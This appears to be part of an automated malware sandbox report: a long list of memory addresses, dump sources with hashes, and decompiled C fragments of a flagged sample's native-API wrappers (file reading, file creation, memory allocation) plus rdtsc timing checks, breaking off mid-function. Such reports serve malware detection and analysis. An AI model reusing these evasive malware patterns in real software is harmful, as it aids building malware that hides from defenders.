                        0x001855c7
                        0x001855ca
                        0x001855cc
                        0x001855ce
                        0x001855ce
                        0x001855d0
                        0x001855d5
                        0x001855db
                        0x001855e1
                        0x001855e3
                        0x001855ea
                        0x001855eb
                        0x001855f1
                        0x001855f4
                        0x001855f6
                        0x001855f8
                        0x001855fe
                        0x001855ff
                        0x00185601
                        0x00185602
                        0x00185604
                        0x00185606
                        0x00185609
                        0x0018560c
                        0x0018560d
                        0x00185610
                        0x00185612
                        0x00185614
                        0x00185617
                        0x00185619
                        0x0018561f
                        0x00185621
                        0x00185628
                        0x00185629
                        0x00185630
                        0x00185632
                        0x00185637
                        0x0018563d
                        0x00185644
                        0x00185645
                        0x0018564b
                        0x00185652
                        0x00185653
                        0x00185656
                        0x00185658
                        0x0018565a
                        0x0018565b
                        0x00185661
                        0x00185663
                        0x00185665
                        0x00185667
                        0x0018566d
                        0x00185670
                        0x00185674
                        0x00185676
                        0x00185677
                        0x0018567d
                        0x00185680
                        0x00185682
                        0x00185684
                        0x00185684
                        0x00185685
                        0x00185685
                        0x0018568c
                        0x0018568e
                        0x00185690
                        0x00185692
                        0x00185692
                        0x00185693
                        0x00185699
                        0x0018569f
                        0x001856a5
                        0x001856a6
                        0x001856a7
                        0x001856ad
                        0x001856b3
                        0x001856b4
                        0x001856b5
                        0x001856b8
                        0x001856ba
                        0x001856bc
                        0x001856bc
                        0x001856bd
                        0x001856bf
                        0x001856c1
                        0x001856c2
                        0x001856c5
                        0x001856c6
                        0x001856c8
                        0x001856ca
                        0x001856ca
                        0x001856cc
                        0x001856d1
                        0x001856d1
                        0x001856d2
                        0x001856d5
                        0x001856d7
                        0x001856dd
                        0x001856df
                        0x001856e1
                        0x001856e2
                        0x001856e4
                        0x001856e6
                        0x001856e7
                        0x001856e9
                        0x001856eb
                        0x001856ed
                        0x001856f4
                        0x001856f4
                        0x001856f6
                        0x001856fb
                        0x001856fd
                        0x001856fe
                        0x00185700
                        0x00185702
                        0x00185705
                        0x0018570c
                        0x0018570e
                        0x00185710
                        0x00185711
                        0x00185713
                        0x00185715
                        0x00185717
                        0x0018571e
                        0x0018571e
                        0x00185720
                        0x00185725
                        0x0018572b
                        0x00185731
                        0x00185732
                        0x00185733
                        0x00185737
                        0x00185739
                        0x0018573f
                        0x00185741
                        0x00185748
                        0x00185748
                        0x0018574a
                        0x0018574f
                        0x00185752
                        0x00185754
                        0x00185756
                        0x00185759
                        0x0018575f
                        0x00185760
                        0x00185762
                        0x00185764
                        0x00185765
                        0x00185767
                        0x00185769
                        0x0018576b
                        0x00185772
                        0x00185772
                        0x00185774
                        0x00185779
                        0x0018577c
                        0x0018577e
                        0x00185780
                        0x00185783
                        0x00185789
                        0x0018578b
                        0x0018578d
                        0x00185793
                        0x00185796
                        0x00185798
                        0x0018579c
                        0x0018579f
                        0x001857a1
                        0x001857a2
                        0x001857a4
                        0x001857a6
                        0x001857aa
                        0x001857ad
                        0x001857af
                        0x001857b0
                        0x001857b2
                        0x001857b4
                        0x001857b8
                        0x001857bb
                        0x001857bd
                        0x001857be
                        0x001857c2
                        0x001857c4
                        0x001857c6
                        0x001857c7
                        0x001857c9
                        0x001857cb
                        0x001857cd
                        0x001857d4
                        0x001857d6
                        0x001857db
                        0x001857de
                        0x001857e0
                        0x001857e2
                        0x001857e7
                        0x001857ec
                        0x001857ee
                        0x001857f0
                        0x001857f0
                        0x001857f2
                        0x001857f7
                        0x001857fd
                        0x00185803
                        0x00185808
                        0x0018580a
                        0x0018580c
                        0x00185813
                        0x00185815
                        0x00185816
                        0x00185818
                        0x0018581a
                        0x0018581a
                        0x0018581e
                        0x00185820
                        0x00185825
                        0x00185827
                        0x0018582d
                        0x0018582e
                        0x00185833
                        0x00185835
                        0x0018583b
                        0x0018583c
                        0x0018583e
                        0x00185840
                        0x00185842
                        0x00185844
                        0x00185846
                        0x0018584c
                        0x0018584e
                        0x00185850
                        0x00185852
                        0x00185852
                        0x00185854
                        0x00185859
                        0x0018585d
                        0x0018585f
                        0x00185865
                        0x00185868
                        0x0018586a
                        0x0018586c
                        0x0018586e
                        0x0018586e
                        0x00185870
                        0x00185877
                        0x00185878
                        0x0018587a
                        0x0018587c
                        0x0018587f
                        0x00185881
                        0x00185882
                        0x00185883
                        0x00185885
                        0x00185887
                        0x0018588d
                        0x00185893
                        0x00185899
                        0x001858a0
                        0x001858a1
                        0x001858a3
                        0x001858a5
                        0x001858ab
                        0x001858ad
                        0x001858b0
                        0x001858b2
                        0x001858b3
                        0x001858b4
                        0x001858b6
                        0x001858b8
                        0x001858b9
                        0x001858ba
                        0x001858bc
                        0x001858be
                        0x001858c0
                        0x001858c2
                        0x001858c6
                        0x001858c8
                        0x001858cc
                        0x001858ce
                        0x001858d2
                        0x001858d4
                        0x001858d6
                        0x001858d8
                        0x001858da
                        0x001858dc
                        0x001858e2
                        0x001858e3
                        0x001858e4
                        0x001858e6
                        0x001858e8
                        0x001858e9
                        0x001858ea
                        0x001858ec
                        0x001858ee
                        0x001858ef
                        0x001858f0
                        0x001858f2
                        0x001858f4
                        0x001858f5
                        0x001858f6
                        0x001858f8
                        0x001858fa
                        0x001858fb
                        0x001858fc
                        0x001858fe
                        0x00185900
                        0x00185901
                        0x00185902
                        0x00185904
                        0x00185906
                        0x00185907
                        0x00185908
                        0x0018590a
                        0x0018590c
                        0x0018590d
                        0x0018590e
                        0x00185910
                        0x00185912
                        0x00185913
                        0x00185914
                        0x00185916
                        0x00185918
                        0x00185919
                        0x0018591a
                        0x0018591c
                        0x0018591e
                        0x0018591f
                        0x00185920
                        0x00185922
                        0x00185924
                        0x00185925
                        0x00185926
                        0x00185928
                        0x0018592a
                        0x0018592b
                        0x0018592c
                        0x0018592e
                        0x00185931
                        0x00185933
                        0x00185935
                        0x00185938
                        0x0018593a
                        0x0018593c
                        0x0018593d
                        0x0018593f
                        0x00185942
                        0x00185944
                        0x00185946
                        0x0018594a
                        0x0018594c
                        0x0018594f
                        0x00185950
                        0x00185952
                        0x00185954
                        0x0018595a
                        0x0018595b
                        0x0018595c
                        0x0018595e
                        0x00185960
                        0x00185962
                        0x00185964
                        0x00185966
                        0x0018596d
                        0x0018596f
                        0x00185971
                        0x00185973
                        0x00185975
                        0x00185977
                        0x0018597b
                        0x0018597d
                        0x00185981
                        0x00185983
                        0x00185989
                        0x0018598f
                        0x00185991
                        0x00185992
                        0x00185994
                        0x00185996
                        0x0018599d
                        0x0018599f
                        0x001859a1
                        0x001859a7
                        0x001859ad
                        0x001859b3
                        0x001859b9
                        0x001859bd
                        0x001859bf
                        0x001859c5
                        0x001859c9
                        0x001859cb
                        0x001859d1
                        0x001859d5
                        0x001859d7
                        0x001859dd
                        0x001859e4
                        0x001859e6
                        0x001859e8
                        0x001859ea
                        0x001859ea
                        0x001859eb
                        0x001859ed
                        0x001859ef
                        0x001859f1
                        0x001859f3
                        0x001859f5
                        0x001859fb
                        0x001859fd
                        0x001859ff
                        0x00185a01
                        0x00185a07
                        0x00185a09
                        0x00185a0b
                        0x00185a0d
                        0x00185a13
                        0x00185a15
                        0x00185a17
                        0x00185a19
                        0x00185a1d
                        0x00185a1f
                        0x00185a21
                        0x00185a23
                        0x00185a25
                        0x00185a2b
                        0x00185a2d
                        0x00185a2f
                        0x00185a31
                        0x00185a3d
                        0x00185a43
                        0x00185a45
                        0x00185a47
                        0x00185a49
                        0x00185a4b
                        0x00185a4d
                        0x00185a50
                        0x00185a51
                        0x00185a53
                        0x00185a59
                        0x00185a5b
                        0x00185a5d
                        0x00185a5f
                        0x00185a61
                        0x00185a64
                        0x00185a66
                        0x00185a68
                        0x00185a6a
                        0x00185a6c
                        0x00185a70
                        0x00185a72
                        0x00185a76
                        0x00185a78
                        0x00185a7a
                        0x00185a7b
                        0x00185a7d
                        0x00185a7f
                        0x00185a86
                        0x00185a88
                        0x00185a8a
                        0x00185a8c
                        0x00185a93
                        0x00185a95
                        0x00185a96
                        0x00185a98
                        0x00185a9f
                        0x00185aa1
                        0x00185aa4
                        0x00185aab
                        0x00185aad
                        0x00185aaf
                        0x00185ab5
                        0x00185abb
                        0x00185ac1
                        0x00185ac7
                        0x00185aca
                        0x00185acc
                        0x00185ace
                        0x00185ad1
                        0x00185ad3
                        0x00185ad6
                        0x00185ad8
                        0x00185ada
                        0x00185adb
                        0x00185add
                        0x00185adf
                        0x00185ae3
                        0x00185ae5
                        0x00185ae9
                        0x00185aeb
                        0x00185aef
                        0x00185af1
                        0x00185af4
                        0x00185af6
                        0x00185afd
                        0x00185b00
                        0x00185b04
                        0x00185b05
                        0x00185b07
                        0x00185b09
                        0x00185b0d
                        0x00185b0f
                        0x00185b15
                        0x00185b17
                        0x00185b19
                        0x00185b1b
                        0x00185b1d
                        0x00185b1f
                        0x00185b21
                        0x00185b24
                        0x00185b26
                        0x00185b28
                        0x00185b2d
                        0x00185b33
                        0x00185b39
                        0x00185b3f
                        0x00185b45
                        0x00185b4b
                        0x00185b51
                        0x00185b57
                        0x00185b5d
                        0x00185b63
                        0x00185b69
                        0x00185b6f
                        0x00185b75
                        0x00185b7b
                        0x00185b81
                        0x00185b87
                        0x00185b8d
                        0x00185b93
                        0x00185b99
                        0x00185b9f
                        0x00185ba1
                        0x00185ba5
                        0x00185ba7
                        0x00185baa
                        0x00185bad
                        0x00185baf
                        0x00185bb5
                        0x00185bb7
                        0x00185bbd
                        0x00185bc3
                        0x00185bc9
                        0x00185bcf
                        0x00185bd1
                        0x00185bd2
                        0x00185bd3
                        0x00185bdb
                        0x00185bdd
                        0x00185bdf
                        0x00185be2
                        0x00185be4
                        0x00185be5
                        0x00185be8
                        0x00185be9
                        0x00185beb
                        0x00185bec
                        0x00185bee
                        0x00185bef
                        0x00185bf5
                        0x00185bfb
                        0x00185c02
                        0x00185c05
                        0x00185c0b
                        0x00185c11
                        0x00185c17
                        0x00185c1d
                        0x00185c23
                        0x00185c29
                        0x00185c2c
                        0x00185c2f
                        0x00185c35
                        0x00185c3b
                        0x00185c41
                        0x00185c47
                        0x00185c4d
                        0x00185c50
                        0x00185c51
                        0x00185c57
                        0x00185c5b
                        0x00185c5e
                        0x00185c5f
                        0x00185c61
                        0x00185c62
                        0x00185c64
                        0x00185c67
                        0x00185c68
                        0x00185c6b
                        0x00185c71
                        0x00185c77
                        0x00185c7d
                        0x00185c83
                        0x00185c89
                        0x00185c8f
                        0x00185c92
                        0x00185c92
                        0x00185c93
                        0x00185c95
                        0x00185c9b
                        0x00185c9d
                        0x00185ca3
                        0x00185ca9
                        0x00185caf
                        0x00185cb5
                        0x00185cbb
                        0x00185cc1
                        0x00185cc3
                        0x00185cc7
                        0x00185cc9
                        0x00185ccd
                        0x00185ccf
                        0x00185cd5
                        0x00185cd7
                        0x00185cdd
                        0x00185ce0
                        0x00185ce7
                        0x00185cf0
                        0x00185cf1
                        0x00185cf7
                        0x00185cfb
                        0x00185d01
                        0x00185d09
                        0x00185d0b
                        0x00185d10
                        0x00185d13
                        0x00185d19
                        0x00185d1b
                        0x00185d1f
                        0x00185d25
                        0x00185d2b
                        0x00185d34
                        0x00185d35
                        0x00185d38
                        0x00185d3a
                        0x00185d3d
                        0x00185d3f
                        0x00185d46
                        0x00185d47
                        0x00185d49
                        0x00185d49
                        0x00185d4f
                        0x00185d52
                        0x00185d54
                        0x00185d55
                        0x00185d55
                        0x00185d56
                        0x00185d5d
                        0x00185d67
                        0x00185d6a
                        0x00185d6f
                        0x00185d71
                        0x00185d75
                        0x00185d76
                        0x00185d77
                        0x00185d7f
                        0x00185d81
                        0x00185d82
                        0x00185d84
                        0x00185d93

                        Memory Dump Source
                        • Source File: 00000000.00000002.255789430.0000000000182000.00000002.00020000.sdmp, Offset: 00180000, based on PE: true
                        • Associated: 00000000.00000002.255763940.0000000000180000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.255861817.000000000018F000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.255929899.000000000019A000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ddf63220d3cbf9b0a417dad8c5c8b27fb19d33a253ee37ba99f4b112576f7f34
                        • Instruction ID: 6fafd7d8b06ae689d8219ac1ff28c17dc68805dcf3e3e0ae89b07433a01fd51e
                        • Opcode Fuzzy Hash: ddf63220d3cbf9b0a417dad8c5c8b27fb19d33a253ee37ba99f4b112576f7f34
                        • Instruction Fuzzy Hash: CD42DB6244E3D0AFD7438B744CA5A827FB0AE53214B2E45EBD4C1CF0E3E259595AC7A3
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000000.00000002.259863231.0000000004DC0000.00000040.00000001.sdmp, Offset: 04DC0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 12a1b31a8173e60e0370e6db987953abaf92acb0aa923cccea5c8d2d90bc6ce8
                        • Instruction ID: bcc92eb1dc34ade5eb38e3aacc2ffb4bc7c71817e686aaa0ae8943a57295dee1
                        • Opcode Fuzzy Hash: 12a1b31a8173e60e0370e6db987953abaf92acb0aa923cccea5c8d2d90bc6ce8
                        • Instruction Fuzzy Hash: 55516D74E406088FD744EFF9D891ADEBBF2EB85304F14CC69E004AB2A4DB749905DB52
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000000.00000002.259863231.0000000004DC0000.00000040.00000001.sdmp, Offset: 04DC0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c8720ff00cd56b5e0681eac87c84ba25afc24ced054f8678bc7775e7a3f021b0
                        • Instruction ID: 42ee9f762309dcdc18c8b80eed1f07667005df510e503c62bc2ccd3b486afe54
                        • Opcode Fuzzy Hash: c8720ff00cd56b5e0681eac87c84ba25afc24ced054f8678bc7775e7a3f021b0
                        • Instruction Fuzzy Hash: 1E516D74E406488FD744EFF9E891ADEBBF2EB85304F14CC69E004AB2A4DB749905DB52
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000000.00000002.259863231.0000000004DC0000.00000040.00000001.sdmp, Offset: 04DC0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b4bfc7377ea1ee3674c76b7245a6133e96a4d29f081e95bb4c771a0f9e3bda0b
                        • Instruction ID: b2eda852036222de2a3d5924d75e0fd9953262e97b7b95848400d5210d1fb9fd
                        • Opcode Fuzzy Hash: b4bfc7377ea1ee3674c76b7245a6133e96a4d29f081e95bb4c771a0f9e3bda0b
                        • Instruction Fuzzy Hash: C14141B1E016198BEB5DCF6B8D4068AFAF7BFC8300F14C1BA851CAB254DB3059868F55
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Executed Functions

                        C-Code - Quality: 23%
                        			E0041A40A(void* __eax, void* __esi, intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
                        				void* _t23;
                        				void* _t32;
                        				intOrPtr* _t34;
                        				void* _t36;
                        
                        				asm("invalid");
                        				_t18 = _a4;
                        				_t34 = _a4 + 0xc48;
                        				E0041AF60(_t32, _a4, _t34,  *((intOrPtr*)(_t18 + 0x10)), 0, 0x2a);
                        				_t5 =  &_a40; // 0x414a31
                        				_t7 =  &_a32; // 0x414d72
                        				_t13 =  &_a8; // 0x414d72
                        				_t23 =  *((intOrPtr*)( *_t34))( *_t13, _a12, _a16, _a20, _a24, _a28,  *_t7, _a36,  *_t5, __esi, _t36); // executed
                        				return _t23;
                        			}







                        0x0041a40d
                        0x0041a413
                        0x0041a41f
                        0x0041a427
                        0x0041a42c
                        0x0041a432
                        0x0041a44d
                        0x0041a455
                        0x0041a459

                        APIs
                        • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.315401814.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: FileRead
                        • String ID: 1JA$rMA$rMA
                        • API String ID: 2738559852-782607585
                        • Opcode ID: 168a3a6ba6aad3fbecb21687f97696ce2b573daee3d708162e6887467be85324
                        • Instruction ID: 4303057fbaaf29cad4171ea9010ed2377fecf0c0394d7fa1fb71fc5b5dab864a
                        • Opcode Fuzzy Hash: 168a3a6ba6aad3fbecb21687f97696ce2b573daee3d708162e6887467be85324
                        • Instruction Fuzzy Hash: 52F0C4B6200118AFCB14DF89DC81EEB77A9AF8C754F158248BA1DA7241C630E811CBE1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 37%
                        			E0041A410(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
                        				void* _t18;
                        				void* _t27;
                        				intOrPtr* _t28;
                        
                        				_t13 = _a4;
                        				_t28 = _a4 + 0xc48;
                        				E0041AF60(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                        				_t4 =  &_a40; // 0x414a31
                        				_t6 =  &_a32; // 0x414d72
                        				_t12 =  &_a8; // 0x414d72
                        				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
                        				return _t18;
                        			}






                        0x0041a413
                        0x0041a41f
                        0x0041a427
                        0x0041a42c
                        0x0041a432
                        0x0041a44d
                        0x0041a455
                        0x0041a459

                        APIs
                        • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.315401814.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: FileRead
                        • String ID: 1JA$rMA$rMA
                        • API String ID: 2738559852-782607585
                        • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                        • Instruction ID: c6e97d42c3e85b78cd3a41c20c82dd28da71633a8e67c8174f08c115ef6e08ba
                        • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                        • Instruction Fuzzy Hash: 87F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 29%
                        			E0041A35A(void* __eax, void* __ebx, void* __eflags, HANDLE* _a4, long _a8, struct _EXCEPTION_RECORD _a12, struct _ERESOURCE_LITE _a16, struct _GUID _a20, long _a24, long _a28, long _a32, long _a36, void* _a40, long _a44) {
                        				intOrPtr _v0;
                        				long _t38;
                        				void* _t41;
                        				void* _t58;
                        				intOrPtr* _t60;
                        
                        				if(__eflags != 0) {
                        					_t60 = __eax + 0xc44;
                        					E0041AF60(_t58);
                        					return  *((intOrPtr*)( *_t60))(_a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, __eax, _t60, _t41);
                        				} else {
                        					asm("scasd");
                        					_t32 = _v0;
                        					_t3 = _t32 + 0xc40; // 0xc40
                        					E0041AF60(_t58, _v0, _t3,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x28);
                        					_t38 = NtCreateFile(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44); // executed
                        					return _t38;
                        				}
                        			}








                        0x0041a35b
                        0x0041a3cf
                        0x0041a3d7
                        0x0041a409
                        0x0041a35d
                        0x0041a35e
                        0x0041a363
                        0x0041a36f
                        0x0041a377
                        0x0041a3ad
                        0x0041a3b1
                        0x0041a3b1

                        APIs
                        • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                        Memory Dump Source
                        • Source File: 00000002.00000002.315401814.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: CreateFile
                        • String ID:
                        • API String ID: 823142352-0
                        • Opcode ID: 3c2591368eefec49bbd50e6ae881d5d24ce5faca65f3f94b5b4afbe06a90733e
                        • Instruction ID: 344b71f7b3a199d2ddbb085444571a9311c99876aed05395be72b1e04dcb046e
                        • Opcode Fuzzy Hash: 3c2591368eefec49bbd50e6ae881d5d24ce5faca65f3f94b5b4afbe06a90733e
                        • Instruction Fuzzy Hash: DD11B4B2214109ABCB08DF99DC84CEB77ADFF8C358B15864DFA1D93215D634E8518BA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
                        Memory Dump Source
                        • Source File: 00000002.00000002.315401814.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: Load
                        • String ID:
                        • API String ID: 2234796835-0
                        • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                        • Instruction ID: bd03027937dafe21d6f438616a486266aae6a772261e1344982784e00def1180
                        • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                        • Instruction Fuzzy Hash: 80015EB5E0020DBBDF10DBA1DC42FDEB3789F54308F0045AAA908A7281F634EB548B95
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E0041A360(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                        				long _t21;
                        				void* _t31;
                        
                        				_t3 = _a4 + 0xc40; // 0xc40
                        				E0041AF60(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                        				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                        				return _t21;
                        			}





                        0x0041a36f
                        0x0041a377
                        0x0041a3ad
                        0x0041a3b1

                        APIs
                        • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                        Memory Dump Source
                        • Source File: 00000002.00000002.315401814.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: CreateFile
                        • String ID:
                        • API String ID: 823142352-0
                        • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                        • Instruction ID: 1571a74e51eef41835f20cf1113afde9e84efeac6e640e2865a3d9423fa4fe5b
                        • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                        • Instruction Fuzzy Hash: FEF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E0041A540(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                        				long _t14;
                        				void* _t21;
                        
                        				_t3 = _a4 + 0xc60; // 0xca0
                        				E0041AF60(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                        				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                        				return _t14;
                        			}





                        0x0041a54f
                        0x0041a557
                        0x0041a579
                        0x0041a57d

                        APIs
                        • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
                        Memory Dump Source
                        • Source File: 00000002.00000002.315401814.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: AllocateMemoryVirtual
                        • String ID:
                        • API String ID: 2167126740-0
                        • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                        • Instruction ID: 60dc777ab2a5703fe93ec60752bbea5a413bae98553eb5929f98badcd8fbe991
                        • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                        • Instruction Fuzzy Hash: B2F015B2200208ABCB14DF89CC81EEB77ADEF8C754F158149BE0897241C630F811CBA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E0041A490(intOrPtr _a4, void* _a8) {
                        				long _t8;
                        				void* _t11;
                        
                        				_t5 = _a4;
                        				_t2 = _t5 + 0x10; // 0x300
                        				_t3 = _t5 + 0xc50; // 0x40a943
                        				E0041AF60(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                        				_t8 = NtClose(_a8); // executed
                        				return _t8;
                        			}





                        0x0041a493
                        0x0041a496
                        0x0041a49f
                        0x0041a4a7
                        0x0041a4b5
                        0x0041a4b9

                        APIs
                        • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
                        Memory Dump Source
                        • Source File: 00000002.00000002.315401814.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: Close
                        • String ID:
                        • API String ID: 3535843008-0
                        • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                        • Instruction ID: a008c5d5ec14fa9f5013d94ab86a46559dd82bf248144eb087863a0ac6a31d62
                        • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                        • Instruction Fuzzy Hash: F7D01776200218ABD710EB99CC85EE77BACEF48B64F158499BA1C9B242C530FA1086E0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 58%
                        			E0041A48A(void* __ebx, intOrPtr _a4, void* _a8) {
                        				long _t9;
                        				void* _t13;
                        
                        				gs =  *((intOrPtr*)(__ebx - 0x63));
                        				0x8bec();
                        				_t6 = _a4;
                        				_t3 = _t6 + 0x10; // 0x300
                        				_t4 = _t6 + 0xc50; // 0x40a943
                        				E0041AF60(_t13, _a4, _t4,  *_t3, 0, 0x2c);
                        				_t9 = NtClose(_a8); // executed
                        				return _t9;
                        			}





                        0x0041a48a
                        0x0041a48d
                        0x0041a493
                        0x0041a496
                        0x0041a49f
                        0x0041a4a7
                        0x0041a4b5
                        0x0041a4b9

                        APIs
                        • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
                        Memory Dump Source
                        • Source File: 00000002.00000002.315401814.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: Close
                        • String ID:
                        • API String ID: 3535843008-0
                        • Opcode ID: e88aaddb16ecc7abfa8ea1c0704b21e9ae7d795a9701f57bb74bc7127bba8e6a
                        • Instruction ID: 6b97a5c630ec2685c44f67ab0c3518f250d9da488a99e2f68952f22904d5cf3e
                        • Opcode Fuzzy Hash: e88aaddb16ecc7abfa8ea1c0704b21e9ae7d795a9701f57bb74bc7127bba8e6a
                        • Instruction Fuzzy Hash: E2D02BA950E2C08BDB10FBB4E4D40CABB60EE8061C72859DFE4A807647D17592159391
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 93%
                        			E00409AB0(intOrPtr _a4) {
                        				intOrPtr _v8;
                        				char _v24;
                        				char _v284;
                        				char _v804;
                        				char _v840;
                        				void* _t24;
                        				void* _t31;
                        				void* _t33;
                        				void* _t34;
                        				void* _t39;
                        				void* _t50;
                        				intOrPtr _t52;
                        				void* _t53;
                        				void* _t54;
                        				void* _t55;
                        				void* _t56;
                        
                        				_t52 = _a4;
                        				_t39 = 0; // executed
                        				_t24 = E00407EA0(_t52,  &_v24); // executed
                        				_t54 = _t53 + 8;
                        				if(_t24 != 0) {
                        					E004080B0( &_v24,  &_v840);
                        					_t55 = _t54 + 8;
                        					do {
                        						E0041BE10( &_v284, 0x104);
                        						E0041C480( &_v284,  &_v804);
                        						_t56 = _t55 + 0x10;
                        						_t50 = 0x4f;
                        						while(1) {
                        							_t31 = E00414DF0(E00414D90(_t52, _t50),  &_v284);
                        							_t56 = _t56 + 0x10;
                        							if(_t31 != 0) {
                        								break;
                        							}
                        							_t50 = _t50 + 1;
                        							if(_t50 <= 0x62) {
                        								continue;
                        							} else {
                        							}
                        							goto L8;
                        						}
                        						_t9 = _t52 + 0x14; // 0xffffe045
                        						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
                        						_t39 = 1;
                        						L8:
                        						_t33 = E004080E0( &_v24,  &_v840);
                        						_t55 = _t56 + 8;
                        					} while (_t33 != 0 && _t39 == 0);
                        					_t34 = E00408160(_t52,  &_v24); // executed
                        					if(_t39 == 0) {
                        						asm("rdtsc");
                        						asm("rdtsc");
                        						_v8 = _t34 - 0 + _t34;
                        						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
                        					}
                        					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
                        					_t20 = _t52 + 0x31; // 0x5608758b
